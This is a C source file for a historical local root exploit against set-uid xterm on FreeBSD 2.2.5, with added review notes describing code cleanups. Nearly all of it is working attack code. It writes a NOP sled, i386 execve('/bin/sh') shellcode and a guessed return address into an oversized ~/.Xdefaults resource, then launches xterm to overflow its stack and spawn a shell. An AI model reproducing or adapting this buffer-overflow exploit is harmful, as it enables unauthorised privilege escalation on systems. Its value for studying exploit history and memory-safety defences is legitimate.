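/*
 * Ones more xterm, Xaw sploit by Kil3r of Lam3rZ. This one is for FreeBSD
 * 2.2.5. Have a fun! Greetz: Bulba, Many, other Lam3rZ members and all
 * Polish HackerZ! Based on 3xterm for Linux; FreeBSD shellcode taken from
 * Xt library bug xterm exploit by Aleph1.
 *
 * Review notes:
 *  - Historical local privilege-escalation proof of concept. It writes an
 *    oversized "xterm*inputMethod" resource into ~/.Xdefaults so that the
 *    (set-uid) xterm of the day overflows a stack buffer while parsing it,
 *    then execs xterm. It only does anything against that vulnerable build.
 *  - OFFSET is a guessed i386 stack address for FreeBSD 2.2.5; it is not
 *    portable, and the payload bytes are i386 FreeBSD execve("/bin/sh")
 *    shellcode. The return-address write assumes a little-endian host.
 *  - The #include lines in this copy were bare "#include" (lost in
 *    extraction); the headers below are reconstructed from what the code
 *    actually calls.
 *  - Fixed here: the feof() read loop duplicated the last line, fgets()
 *    results were unchecked, the filter used strncmp(...) < 0 (which kept
 *    only lines sorting before the resource name) instead of != 0, the
 *    file swap went through system() and a shell, and main() was void.
 */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CONFFILE ".Xdefaults"
#define OLDFILE  ".Xdefaults.old"
#define NEWFILE  ".Xdefaults.new"
#define OFFSET   0xefbfcc2c /* address on stack with shellcode; try to decrease it if any problems... */

#define RESOURCE "xterm*inputMethod" /* resource whose value carries the payload */
#define BUFLEN   16384               /* size of the line buffer and of the payload buffer */
#define SHELL_AT 900                 /* byte offset of the shellcode inside the NOP sled */
#define RET_AT   1028                /* byte offset where the overwritten return address lands */

/* Kept from the original for source compatibility; no longer used (memcpy replaces the pointer walks). */
int *ptr;
char *cptr;

/*
 * Return the current stack pointer (low 32 bits, via %eax).
 * Not called by main(); kept from the original as an aid for guessing OFFSET.
 */
long get_esp(void)
{
    long sp;

    __asm__("movl %%esp,%%eax" : "=a"(sp));
    return sp;
}

/*
 * Copy every line of `in` to `out` except those whose first non-blank text
 * is RESOURCE, so the entry appended afterwards is the only one xterm sees.
 *
 * A line longer than the buffer arrives in several fgets() chunks; the
 * keep/drop decision is taken on the first chunk and carried across the
 * rest, so a continuation chunk is never re-tested on its own.
 */
static void copy_filtered(FILE *in, FILE *out)
{
    char line[BUFLEN];
    int keep = 1;       /* decision for the logical line currently being copied */
    int line_start = 1; /* next chunk begins a new logical line */

    while (fgets(line, sizeof line, in) != NULL) {
        if (line_start) {
            const char *p = line;

            while (isblank((unsigned char)*p))
                p++;
            keep = strncmp(p, RESOURCE, sizeof RESOURCE - 1) != 0;
        }
        if (keep)
            fputs(line, out);

        size_t n = strlen(line);
        line_start = n > 0 && line[n - 1] == '\n';
    }
}

/*
 * Fill `buf` (of `len` bytes) with the resource value: a NOP (0x90) sled
 * with the shellcode at SHELL_AT and the return address OFFSET - 2 at
 * RET_AT, followed by four zero bytes. That zero terminates the string, so
 * fputs() later writes exactly RET_AT + 4 bytes of the sled.
 */
static void build_payload(char *buf, size_t len)
{
    /* i386 FreeBSD execve("/bin/sh") shellcode (from Aleph1's Xt exploit). It
     * contains no 0x00 byte, so sizeof - 1 equals the strlen() the original used. */
    static const char execshell[] =
        "\xeb\x23"
        "\x5e"
        "\x8d\x1e"
        "\x89\x5e\x0b"
        "\x31\xd2"
        "\x89\x56\x07"
        "\x89\x56\x0f"
        "\x89\x56\x14"
        "\x88\x56\x19"
        "\x31\xc0"
        "\xb0\x3b"
        "\x8d\x4e\x0b"
        "\x89\xca"
        "\x52"
        "\x51"
        "\x53"
        "\x50"
        "\xeb\x18"
        "\xe8\xd8\xff\xff\xff"
        "/bin/sh"
        "\x01\x01\x01\x01"
        "\x02\x02\x02\x02"
        "\x03\x03\x03\x03"
        "\x9a\x04\x04\x04\x04\x07\x04";
    uint32_t ret = OFFSET - 2; /* same bit pattern the original stored through an int * */

    memset(buf, 0x90, len);
    buf[len - 1] = '\0';
    memcpy(buf + SHELL_AT, execshell, sizeof execshell - 1);
    memcpy(buf + RET_AT, &ret, sizeof ret);        /* host (i386: little-endian) byte order */
    memset(buf + RET_AT + sizeof ret, 0, sizeof ret); /* terminator right after the address */
}

/*
 * Rewrite ~/.Xdefaults with the payload resource, keep the old file as
 * .Xdefaults.old, then exec xterm so it parses the new resource.
 *
 * argc/argv are unused. Returns 1 on any I/O failure (or if execl() returns).
 */
int main(int argc, char *argv[])
{
    const char *home;
    FILE *f_in, *f_out;
    char shellbuf[BUFLEN];

    (void)argc;
    (void)argv;

    /* Work in $HOME: xterm reads .Xdefaults from there, not from the cwd. */
    home = getenv("HOME");
    if (home != NULL && chdir(home) != 0) {
        perror("chdir");
        return 1;
    }

    f_out = fopen(NEWFILE, "w");
    if (f_out == NULL) {
        perror("fopen");
        return 1;
    }

    /* Carry over the existing resources minus any previous inputMethod entry. */
    f_in = fopen(CONFFILE, "r");
    if (f_in != NULL) {
        copy_filtered(f_in, f_out);
        fclose(f_in);
    }

    build_payload(shellbuf, sizeof shellbuf);
    fputs(RESOURCE ":", f_out);
    fputs(shellbuf, f_out);
    if (fclose(f_out) != 0) { /* fclose flushes; a failure here means a truncated payload */
        perror("fclose");
        return 1;
    }

    /* Back up the old file and swap the new one in. rename() replaces the
     * original "cp"/"mv -f" through system(): no shell, and the swap is
     * atomic. The backup is best-effort, as the original cp was (no file,
     * no backup). */
    rename(CONFFILE, OLDFILE);
    if (rename(NEWFILE, CONFFILE) != 0) {
        perror("rename");
        return 1;
    }

    execl("/usr/X11R6/bin/xterm", "xterm", (char *)NULL);
    perror("execl"); /* only reached if the exec failed */
    return 1;
}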